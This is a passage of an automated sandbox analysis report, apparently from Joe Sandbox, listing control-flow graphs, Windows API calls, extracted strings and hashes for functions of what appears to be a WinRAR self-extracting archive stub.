45 7ff7390c89f9-7ff7390c8a02 39->45 41->19 42->29 46 7ff7390c8a09-7ff7390c8a0c 43->46 44->45 45->20 49 7ff7390c8a04 45->49 50 7ff7390c8a4f-7ff7390c8a52 46->50 51 7ff7390c8a0e-7ff7390c8a11 46->51 49->46 55 7ff7390c8b83-7ff7390c8bad call 7ff7390d98e0 50->55 56 7ff7390c8a58-7ff7390c8a6e call 7ff7390c4924 call 7ff7390c3b10 50->56 54 7ff7390c8a15-7ff7390c8a3d call 7ff7390c49d8 GetFileAttributesW 51->54 70 7ff7390c8a3f-7ff7390c8a48 54->70 71 7ff7390c8a4c 54->71 75 7ff7390c8a70-7ff7390c8ae2 call 7ff7390c8438 * 2 call 7ff7390c6118 call 7ff7390c3774 call 7ff7390c6118 call 7ff7390d41e4 56->75 76 7ff7390c8ae7-7ff7390c8b22 call 7ff7390c3774 AllocConsole 56->76 58->59 64 7ff7390c8be0-7ff7390c8bec call 7ff7390c1b80 59->64 65 7ff7390c8bf1-7ff7390c8bfa SetThreadExecutionState 59->65 64->65 70->54 74 7ff7390c8a4a 70->74 71->50 74->50 82 7ff7390c8b7a-7ff7390c8b7c ExitProcess 75->82 81 7ff7390c8b24-7ff7390c8b74 GetCurrentProcessId AttachConsole call 7ff7390de7d8 GetStdHandle WriteConsoleW Sleep FreeConsole 76->81 76->82 81->82
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcessswprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemVersionWrite
                                                                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                            • API String ID: 2569216850-2013832382
                                                                                                            • Opcode ID: ce432e740b32594833e9f492e7008bfadafb5548ece1cec03727f54a8be75c5d
                                                                                                            • Instruction ID: f638ecf8af6c7fccf18507bdebb3ab03b403b350e31957a50a79461d5af01e9e
                                                                                                            • Opcode Fuzzy Hash: ce432e740b32594833e9f492e7008bfadafb5548ece1cec03727f54a8be75c5d
                                                                                                            • Instruction Fuzzy Hash: 8C12EA35A09F4BA5EB21AF20E8801E9B3BAFF44354F840536DA8D067A4EF3CD655D760
                                                                                                            Function 00007FF7390D5700 Relevance: 98.7, APIs: 46, Strings: 10, Instructions: 680windowfilesleepCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 95 7ff7390d5700-7ff7390d575f call 7ff7390d9920 call 7ff7390c1230 100 7ff7390d5765-7ff7390d576b 95->100 101 7ff7390d62c8 95->101 103 7ff7390d5771-7ff7390d5773 100->103 104 7ff7390d5f49-7ff7390d5f69 call 7ff7390d7adc 100->104 102 7ff7390d62cb-7ff7390d62ed call 7ff7390d98e0 101->102 107 7ff7390d5775-7ff7390d577b 103->107 108 7ff7390d5786-7ff7390d5788 103->108 115 7ff7390d5f6b-7ff7390d5f76 SendMessageW 104->115 116 7ff7390d5f7c-7ff7390d5f86 104->116 111 7ff7390d57ec-7ff7390d57f3 107->111 112 7ff7390d577d-7ff7390d577f 107->112 108->102 113 7ff7390d588d-7ff7390d58b2 GetDlgItemTextW 111->113 114 7ff7390d57f9-7ff7390d5800 111->114 117 7ff7390d5781-7ff7390d5784 112->117 118 7ff7390d57c8-7ff7390d57d6 112->118 119 7ff7390d58b4-7ff7390d58c5 113->119 120 7ff7390d58dc-7ff7390d58e3 113->120 114->113 123 7ff7390d5806-7ff7390d582c call 7ff7390c6118 SetDlgItemTextW 114->123 115->116 124 7ff7390d5fa3-7ff7390d6040 GetDlgItem SendMessageW call 7ff7390d3fac GetDlgItem SetWindowTextW call 7ff7390d45f0 call 7ff7390d2470 116->124 125 7ff7390d5f88-7ff7390d5f9d SendDlgItemMessageW 116->125 117->108 126 7ff7390d578d-7ff7390d57b1 call 7ff7390c6118 call 7ff7390c1120 117->126 121 7ff7390d57e5-7ff7390d57e7 118->121 122 7ff7390d57d8-7ff7390d57df 118->122 128 7ff7390d58cb 119->128 129 7ff7390d58f3-7ff7390d590f GetDlgItem 120->129 130 7ff7390d58e5-7ff7390d58ee 120->130 131 7ff7390d58ce-7ff7390d58d7 EndDialog 121->131 122->101 122->121 145 7ff7390d5832-7ff7390d5839 123->145 166 7ff7390d6042-7ff7390d6052 call 7ff7390d682c 124->166 167 7ff7390d6057-7ff7390d605e 124->167 125->124 126->101 155 7ff7390d57b7-7ff7390d57c3 126->155 128->131 137 7ff7390d5911-7ff7390d5937 SendMessageW * 2 129->137 138 7ff7390d593d-7ff7390d594d SetFocus 129->138 136 7ff7390d5e77-7ff7390d5e7e 130->136 131->101 136->128 142 7ff7390d5e84-7ff7390d5e86 136->142 137->138 143 7ff7390d594f-7ff7390d595c call 7ff7390c6118 138->143 144 7ff7390d595e-7ff7390d5982 call 7ff7390c8168 call 7ff7390d7794 call 7ff7390c6118 138->144 142->128 149 7ff7390d5e8c-7ff7390d5ee7 call 7ff7390c6118 SetDlgItemTextW call 7ff7390c6118 call 7ff7390c8168 142->149 163 7ff7390d59a6-7ff7390d59b4 call 7ff7390d7858 143->163 176 7ff7390d5987-7ff7390d599f call 7ff7390c3774 144->176 145->101 151 7ff7390d583f-7ff7390d5846 145->151 199 7ff7390d5f25-7ff7390d5f44 call 7ff7390c6118 call 7ff7390d41e4 149->199 200 7ff7390d5ee9-7ff7390d5ef0 149->200 151->101 152 7ff7390d584c-7ff7390d5860 GetMessageW 151->152 152->101 158 7ff7390d5866-7ff7390d5875 IsDialogMessageW 152->158 161 7ff7390d62bf-7ff7390d62c2 SetDlgItemTextW 155->161 158->145 164 7ff7390d5877-7ff7390d588b TranslateMessage DispatchMessageW 158->164 161->101 179 7ff7390d59b6-7ff7390d59bd call 7ff7390d8004 163->179 180 7ff7390d59c2-7ff7390d59ca 163->180 164->145 166->167 172 7ff7390d6093-7ff7390d609a 167->172 173 7ff7390d6060-7ff7390d608d call 7ff7390c6118 SetDlgItemTextW call 7ff7390c6118 SetDlgItemTextW 167->173 181 7ff7390d60a0-7ff7390d60ad call 7ff7390d682c 172->181 182 7ff7390d6179-7ff7390d6180 172->182 173->172 176->163 179->180 189 7ff7390d59cc-7ff7390d59da call 7ff7390c3120 180->189 190 7ff7390d59e8-7ff7390d59ff call 7ff7390c2ee4 180->190 192 7ff7390d60b2-7ff7390d60bc 181->192 183 7ff7390d6186-7ff7390d618d 182->183 184 7ff7390d6239-7ff7390d6240 182->184 183->184 194 7ff7390d6193-7ff7390d619a 183->194 195 7ff7390d6242-7ff7390d6247 EnableWindow 184->195 196 7ff7390d624d-7ff7390d6254 184->196 189->190 212 7ff7390d59dc-7ff7390d59e3 call 7ff7390d49c8 189->212 215 7ff7390d5a01-7ff7390d5a0f GetLastError 190->215 216 7ff7390d5a12-7ff7390d5a23 call 7ff7390d467c 190->216 203 7ff7390d60f3-7ff7390d60f9 192->203 204 7ff7390d60be-7ff7390d60c5 192->204 194->184 207 7ff7390d61a0-7ff7390d61ad 194->207 195->196 208 7ff7390d6274-7ff7390d627c 196->208 209 7ff7390d6256-7ff7390d626f call 7ff7390c11e4 * 2 196->209 199->101 200->199 211 7ff7390d5ef2-7ff7390d5f20 call 7ff7390de7d8 call 7ff7390c6118 call 7ff7390c3774 200->211 217 7ff7390d60fb-7ff7390d610a call 7ff739138170 203->217 218 7ff7390d6167-7ff7390d6174 call 7ff7390d682c 203->218 204->203 213 7ff7390d60c7-7ff7390d60ee call 7ff7390d36e8 call 7ff7390dea98 204->213 219 7ff7390d61b3-7ff7390d61b9 207->219 221 7ff7390d627e-7ff7390d6285 208->221 222 7ff7390d62a7-7ff7390d62ae 208->222 209->208 211->199 212->190 213->203 215->216 253 7ff7390d5a34-7ff7390d5a3c 216->253 254 7ff7390d5a25-7ff7390d5a31 GetLastError 216->254 217->218 255 7ff7390d610c-7ff7390d6113 217->255 218->182 231 7ff7390d61c4-7ff7390d61ca 219->231 232 7ff7390d61bb-7ff7390d61c2 219->232 221->222 234 7ff7390d6287-7ff7390d6297 221->234 222->101 227 7ff7390d62b0-7ff7390d62bd call 7ff7390c6118 222->227 227->161 243 7ff7390d61cc-7ff7390d61d3 231->243 244 7ff7390d61d9-7ff7390d6203 call 7ff7390c8124 call 7ff7390c6118 call 7ff7390c8124 231->244 232->231 242 7ff7390d6208-7ff7390d6210 232->242 246 7ff7390d62a1 call 7ff739138130 234->246 247 7ff7390d6299-7ff7390d629f SendMessageW 234->247 242->219 250 7ff7390d6212-7ff7390d6234 call 7ff7390d36e8 242->250 243->244 256 7ff7390d61d5-7ff7390d61d7 243->256 244->242 246->222 247->222 250->184 261 7ff7390d5a3e-7ff7390d5a41 253->261 262 7ff7390d5aaa-7ff7390d5aad 253->262 254->253 255->218 260 7ff7390d6115-7ff7390d6131 call 7ff7390d682c 255->260 256->219 260->218 280 7ff7390d6133-7ff7390d6159 DialogBoxParamW 260->280 267 7ff7390d5a43-7ff7390d5a87 GetTickCount call 7ff7390c3774 call 7ff7390c200c call 7ff7390c2138 261->267 268 7ff7390d5abb-7ff7390d5ac3 261->268 264 7ff7390d5ab3-7ff7390d5ab5 262->264 265 7ff7390d5d34-7ff7390d5da9 call 7ff7390c1208 * 2 call 7ff7390c6118 SetDlgItemTextW call 7ff7390c1208 SetDlgItemTextW GetDlgItem 262->265 264->268 271 7ff7390d5ccb-7ff7390d5d2f call 7ff7390c6118 call 7ff7390c3774 call 7ff7390c1dec call 7ff7390c6118 call 7ff7390d41e4 264->271 315 7ff7390d5dd1-7ff7390d5e34 call 7ff7390d682c * 2 call 7ff7390d7f68 call 7ff7390d682c 265->315 316 7ff7390d5dab-7ff7390d5dcb GetWindowLongPtrW SetWindowLongPtrW 265->316 305 7ff7390d5a98-7ff7390d5a9f call 7ff7390c2054 267->305 306 7ff7390d5a89-7ff7390d5a95 GetLastError 267->306 273 7ff7390d5cc2-7ff7390d5cc5 268->273 274 7ff7390d5ac9-7ff7390d5b94 GetModuleFileNameW call 7ff7390c6ff8 call 7ff7390c3774 CreateFileMappingW 268->274 273->121 273->271 296 7ff7390d5c3a 274->296 297 7ff7390d5b9a-7ff7390d5baa GetCommandLineW 274->297 280->218 287 7ff7390d615b 280->287 287->218 307 7ff7390d5c3f-7ff7390d5c70 ShellExecuteExW call 7ff7390c7268 * 2 296->307 302 7ff7390d5bc1-7ff7390d5c38 call 7ff7390d51f0 * 3 call 7ff7390c7098 MapViewOfFile call 7ff7390db6a0 297->302 303 7ff7390d5bac-7ff7390d5bbc call 7ff7390c8168 297->303 302->307 303->302 319 7ff7390d5aa4 305->319 306->305 328 7ff7390d5c72-7ff7390d5c81 call 7ff739138138 307->328 329 7ff7390d5ca8 307->329 349 7ff7390d5e36-7ff7390d5e3d 315->349 350 7ff7390d5e5d-7ff7390d5e65 call 7ff7390c11e4 315->350 316->315 319->262 340 7ff7390d5c84-7ff7390d5c87 328->340 335 7ff7390d5cab-7ff7390d5cae 329->335 335->273 339 7ff7390d5cb0-7ff7390d5cbc UnmapViewOfFile CloseHandle 335->339 339->273 343 7ff7390d5c9b-7ff7390d5ca6 340->343 344 7ff7390d5c89-7ff7390d5c99 Sleep 340->344 343->335 344->340 344->343 349->350 352 7ff7390d5e3f-7ff7390d5e46 349->352 353 7ff7390d5e6a-7ff7390d5e71 350->353 352->350 354 7ff7390d5e48-7ff7390d5e58 call 7ff7390d682c 352->354 353->136 354->350
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Item$MessageText$Send$Windowswprintf$File$DialogErrorLast$LoadLongStringView$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapwcscpy
                                                                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$p$runas$winrarsfxmappingfile.tmp
                                                                                                            • API String ID: 3439070531-4012663800
                                                                                                            • Opcode ID: da27ffef64335008d1099b6b6e0298a3466b5843002851257f781f8ef4d1efb1
                                                                                                            • Instruction ID: 3d150e65bd83b3b1859d990c34198e6e5e9abd796fa7a4383574d7a2107cbc5e
                                                                                                            • Opcode Fuzzy Hash: da27ffef64335008d1099b6b6e0298a3466b5843002851257f781f8ef4d1efb1
                                                                                                            • Instruction Fuzzy Hash: FC629026E08643B5FA50BF61A8802BEA7B7AF45784FC40135DC4E276A6DF3DE505E720
                                                                                                            Function 00007FF7390D682C Relevance: 48.1, APIs: 18, Strings: 9, Instructions: 856COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentExecuteExpandShellStrings
                                                                                                            • String ID: %s%s%u$%s.%d.tmp$.lnk$<br>$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                            • API String ID: 3420131149-2038501859
                                                                                                            • Opcode ID: a889c194402728be74adb15ad15893641eecdd4389561b4fba8d21e503751021
                                                                                                            • Instruction ID: 71e7c061ed6d800f73b7012551c25774c9c78a096b651f7eaf4836adc27b160f
                                                                                                            • Opcode Fuzzy Hash: a889c194402728be74adb15ad15893641eecdd4389561b4fba8d21e503751021
                                                                                                            • Instruction Fuzzy Hash: 5E829462A18683A4EB70BF24D8502FDA3B2FF40784FC04435D99D4BA95DF6CE685E760
                                                                                                            Function 00007FF7390D8588 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 197filesleeptimeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 728 7ff7390d8588-7ff7390d85fb call 7ff7390c84b0 call 7ff7390d3fac call 7ff7390d47f0 call 7ff7390da940 GetCommandLineW 737 7ff7390d86c5-7ff7390d8816 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime call 7ff7390c3774 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7390d5598 call 7ff7390c527c call 7ff7390d26bc * 2 DialogBoxParamW call 7ff7390d2798 * 2 728->737 738 7ff7390d8601-7ff7390d8610 call 7ff7390d667c 728->738 771 7ff7390d881e-7ff7390d8825 737->771 772 7ff7390d8818 Sleep 737->772 743 7ff7390d8616-7ff7390d8632 OpenFileMappingW 738->743 744 7ff7390d86bd-7ff7390d86c0 call 7ff7390d8100 738->744 747 7ff7390d8634-7ff7390d8650 MapViewOfFile 743->747 748 7ff7390d86b2-7ff7390d86bb CloseHandle 743->748 744->737 750 7ff7390d8652-7ff7390d86a4 call 7ff7390db6a0 call 7ff7390d8100 call 7ff7390c7098 call 7ff7390c71e4 call 7ff7390c7268 747->750 751 7ff7390d86a9-7ff7390d86ac UnmapViewOfFile 747->751 748->737 750->751 751->748 773 7ff7390d882c-7ff7390d8840 call 7ff7390c6fc8 771->773 774 7ff7390d8827 call 7ff7390d4b7c 771->774 772->771 778 7ff7390d8842-7ff7390d8849 call 7ff7390d9900 773->778 779 7ff7390d884e-7ff7390d8865 DeleteObject 773->779 774->773 778->779 780 7ff7390d886d-7ff7390d8874 779->780 781 7ff7390d8867 DeleteObject 779->781 783 7ff7390d8876-7ff7390d887d 780->783 784 7ff7390d8890-7ff7390d88a1 780->784 781->780 783->784 785 7ff7390d887f-7ff7390d888b call 7ff7390c1dec 783->785 786 7ff7390d88a3-7ff7390d88af call 7ff7390d8190 CloseHandle 784->786 787 7ff7390d88b5-7ff7390d88c2 784->787 785->784 786->787 790 7ff7390d88c4-7ff7390d88d1 787->790 791 7ff7390d88e7-7ff7390d88ec call 7ff7390d4868 787->791 794 7ff7390d88d3-7ff7390d88db 790->794 795 7ff7390d88e1-7ff7390d88e3 790->795 796 7ff7390d88f1-7ff7390d891a call 7ff7390d98e0 791->796 794->791 797 7ff7390d88dd-7ff7390d88df 794->797 795->791 798 7ff7390d88e5 795->798 797->791 798->791
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressEnvironmentFileHandleProcVariable$Module$CloseDeleteObjectView$CommandCurrentDialogDirectoryIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepTimeUnmapswprintf
                                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                            • API String ID: 1691232531-3710569615
                                                                                                            • Opcode ID: a3bf5f42e71719cbbf960a3d7363c2074e270f99de69e98c2c0fc4e4cfba942b
                                                                                                            • Instruction ID: e03550d70ef07b8698698f4b31f4592bf9ce00866181900eb23b1281b468fb16
                                                                                                            • Opcode Fuzzy Hash: a3bf5f42e71719cbbf960a3d7363c2074e270f99de69e98c2c0fc4e4cfba942b
                                                                                                            • Instruction Fuzzy Hash: DDA14822E09A47A6FB50FF20E8943B9A3B2BF84744FC40035E94E566A5DF3DE544E760
                                                                                                            Function 00007FF7390C5D20 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                                            • String ID: $%s:$CAPTION
                                                                                                            • API String ID: 2100155373-404845831
                                                                                                            • Opcode ID: ed9897392241a368d1e38849f765e6efa4e3f050674a46d66731dde9b4f7c43a
                                                                                                            • Instruction ID: ec8a0a8d559859bcae0a7669dda80626c1c62256c81eaed9a3323a54e01550ad
                                                                                                            • Opcode Fuzzy Hash: ed9897392241a368d1e38849f765e6efa4e3f050674a46d66731dde9b4f7c43a
                                                                                                            • Instruction Fuzzy Hash: AF910932B2864297E714EF2AE84066AE7B2F784784F845535EE8D57B58DF3CE805CB00
                                                                                                            Function 00007FF7390CB31C Relevance: 22.3, APIs: 4, Strings: 8, Instructions: 1345COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                            • String ID: AES-0017$vector too long$ymv$yxxxxxxx$z01$zip$zipx$zx01
                                                                                                            • API String ID: 3936042273-2415556211
                                                                                                            • Opcode ID: 09f1c187dc0552cc8713725149f3ec7f12a1d1dedc4bc0fa06c00fb6dfe9dd22
                                                                                                            • Instruction ID: ca7737cb3b348d3937af13839cf55d2aefa680ef8a1f60697425010f32f6da40
                                                                                                            • Opcode Fuzzy Hash: 09f1c187dc0552cc8713725149f3ec7f12a1d1dedc4bc0fa06c00fb6dfe9dd22
                                                                                                            • Instruction Fuzzy Hash: F5E2B061E08A53B5FB50BF20E8802B9A3B2EF44B44FD44535DA8D6B6A5DF7CE441E720
                                                                                                            Function 00007FF7390D405C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                            • String ID: PNG
                                                                                                            • API String ID: 211097158-364855578
                                                                                                            • Opcode ID: 81385efa7a6c606c7f2dbc4c83b12490540c4a129177261131c989a7fb397875
                                                                                                            • Instruction ID: 6d475043cf918c1c86b5c34e7a3b303bf47b2b513d1534dc65a3d12fad6a8d1b
                                                                                                            • Opcode Fuzzy Hash: 81385efa7a6c606c7f2dbc4c83b12490540c4a129177261131c989a7fb397875
                                                                                                            • Instruction Fuzzy Hash: 02410C76E09B0BA2EB04AF55E854379E3B6AF84B94F844435DD0D473A4DF7CE4459320
                                                                                                            Function 00007FF7390C3984 Relevance: 7.6, APIs: 5, Instructions: 97fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C39CE
                                                                                                            • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C39FF
                                                                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C3A0E
                                                                                                            • FindNextFileW.KERNEL32(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C3A35
                                                                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C3A43
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
